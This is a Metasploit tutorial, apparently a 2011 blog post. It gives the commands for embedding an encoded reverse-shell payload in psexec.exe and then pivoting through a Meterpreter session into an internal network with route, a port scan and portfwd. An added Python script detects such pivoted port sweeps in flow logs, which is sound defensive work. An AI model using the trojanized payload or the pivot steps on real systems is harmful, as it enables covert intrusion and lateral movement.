03/15/11 Meterpreter encoding & pivot
In this tutorial I use the Back|Track distro and Metasploit to encode psexec.exe and then copy it over to a fully patched Windows XP box. We can get our executable onto the victim machine a number of ways, and I will save that for later. The steps involved in using Metasploit are listed below and shown in the video.
```
# msfpayload windows/shell/reverse_tcp LHOST=192.168.1.132 LPORT=4444 R | msfencode -c 10 -e x86/shikata_ga_nai -x /root/psexec.exe -t exe > psexec3.exe
# msfconsole
msf> use multi/handler
msf> set payload windows/meterpreter/reverse_tcp
msf> set LPORT 4444
msf> set LHOST 192.168.1.132
msf> exploit
meterpreter> ipconfig              # lists two interfaces: 192.168.1.134 and 192.168.15.2
meterpreter> run arp_scanner -h    # help for the script
meterpreter> run arp_scanner -r 192.168.15.1/24
meterpreter> background
msf> route add 192.168.15.1 255.255.255.0 1   # the trailing 1 is the Meterpreter session id
msf> route print
msf> use auxiliary/scanner/portscan/tcp
msf> set RHOSTS 192.168.15.1, 192.168.15.3    # the hosts found by the ARP scan above
msf> set PORTS 1-200                          # any range you like, but larger ranges take longer
msf> run                                      # gives the list of open ports on each host
msf> back
msf> sessions -i 1
meterpreter> portfwd add -l 8000 -p 80 -r 192.168.15.3
meterpreter> portfwd add -l 8080 -p 80 -r 192.168.15.1
```

Open Firefox at http://127.0.0.1:8000 and http://127.0.0.1:8080. We have now viewed two systems internal to the network by pivoting through the Meterpreter session. The scan went through 192.168.1.134 > 192.168.15.2 > 192.168.15.1 & 192.168.15.3. We then used the portfwd command to display the internal web pages locally over SSL.
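From the defender's side, the part of this walkthrough that leaves the clearest trace on the internal network is the `auxiliary/scanner/portscan/tcp` run: the compromised host's second interface (192.168.15.2) suddenly opens connections to many ports on several neighbours within seconds. The script below is an added example, not part of the original post, that reads constructed firewall/flow-style log lines (timestamp, source, destination, destination port, action) and flags any source that touches a threshold of distinct ports on one destination inside a short window, then groups those hits per source so a single host sweeping several neighbours stands out. The log format, addresses and thresholds are assumptions chosen to match the addresses in the tutorial.

```python
"""Flag a pivoted TCP port sweep in flow-style connection logs.

Added example (not from the original post). Log format and sample records
are constructed: "ISO-timestamp src dst dport action".
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Ports the constructed sweep touches (a subset of the 1-200 range in the post).
SCAN_PORTS = [21, 22, 23, 25, 53, 80, 110, 135, 139, 143, 443, 445]


def _build_sample_log():
    """Constructed records: the pivot host (192.168.15.2) sweeps two internal
    hosts one port per second, while a workstation (192.168.15.50) makes
    ordinary web and DNS connections spread over an hour."""
    base = datetime(2011, 3, 15, 10, 0, 0)
    lines = []
    for i, port in enumerate(SCAN_PORTS):
        t = (base + timedelta(seconds=i)).isoformat()
        lines.append(f"{t} 192.168.15.2 192.168.15.3 {port} DENY")
        lines.append(f"{t} 192.168.15.2 192.168.15.1 {port} ALLOW")
    for i in range(6):
        t = (base + timedelta(minutes=10 * i)).isoformat()
        lines.append(f"{t} 192.168.15.50 192.168.15.3 80 ALLOW")
        lines.append(f"{t} 192.168.15.50 192.168.15.1 53 ALLOW")
    return lines


SAMPLE_LOG = _build_sample_log()


def parse_line(line):
    """Split one record into (timestamp, src, dst, dport, action)."""
    ts, src, dst, dport, action = line.split()
    return datetime.fromisoformat(ts), src, dst, int(dport), action


def detect_scans(lines, threshold=10, window_seconds=60):
    """Return {(src, dst): distinct_ports} for every source/destination pair
    where the source touched at least `threshold` distinct destination ports
    within any `window_seconds` sliding window. Allowed and denied
    connections both count: a sweep is visible either way."""
    events = defaultdict(list)
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ts, src, dst, dport, _ = parse_line(line)
        events[(src, dst)].append((ts, dport))

    hits = {}
    for pair, evs in events.items():
        evs.sort()  # chronological order so the window can slide forward
        best, j = 0, 0
        for i in range(len(evs)):
            # Advance j to the first event outside the window starting at i.
            while j < len(evs) and (evs[j][0] - evs[i][0]).total_seconds() <= window_seconds:
                j += 1
            best = max(best, len({port for _, port in evs[i:j]}))
        if best >= threshold:
            hits[pair] = best
    return hits


def scanning_sources(hits):
    """Group scan hits by source: {src: sorted list of swept destinations}.
    One source sweeping several neighbours is the shape a pivoted scan leaves."""
    by_src = defaultdict(list)
    for (src, dst), _ in hits.items():
        by_src[src].append(dst)
    return {src: sorted(dsts) for src, dsts in by_src.items()}


if __name__ == "__main__":
    found = detect_scans(SAMPLE_LOG)
    for (src, dst), n in sorted(found.items()):
        print(f"{src} -> {dst}: {n} distinct ports inside the window")
    print("sources sweeping multiple hosts:", scanning_sources(found))
```

The threshold and window are the two knobs worth tuning against real traffic: a single workstation legitimately talking to a server on a handful of ports never approaches ten distinct ports in a minute, whereas the scan in the tutorial covers 200 ports per host. The same grouping by source is also what points at which internal machine the pivot is running through, which is the host to pull for incident response.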